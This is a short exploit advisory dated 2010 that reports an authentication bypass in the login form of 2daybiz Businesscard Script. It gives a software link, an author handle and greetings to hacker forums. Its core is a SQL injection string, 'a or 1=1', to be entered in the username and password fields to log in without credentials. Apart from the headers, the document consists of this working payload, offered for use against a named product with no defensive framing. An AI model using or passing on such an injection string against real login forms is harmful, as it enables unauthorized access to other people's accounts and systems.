17 lines
No EOL
725 B
Text
17 lines
No EOL
725 B
Text
# Exploit Title: 2daybiz Businesscard Script Authentication bypass
|
|
# Date: 14th july 2010
|
|
# Author: D4rk357
|
|
#Critical:high
|
|
#contact:d4rk357[at]yahoo[dot]in
|
|
# Software Link:http://www.2daybiz.com/products/businesscard/index.php
|
|
|
|
Greetz to :b0nd, Fbih2s,rockey killer,The empty(), punter,eberly,prashant
|
|
Shoutz to : http://www.garage4hackers.com/forum.php , h4ck3r.in and all ICW members
|
|
|
|
##############################################################################
|
|
|
|
2daybiz Businesscard Login Form Suffers from authentication bypass .
|
|
String used for authentication bypass is "a or 1=1" in username and password fields
|
|
and it yeilds login .
|
|
|
|
################################################################################# |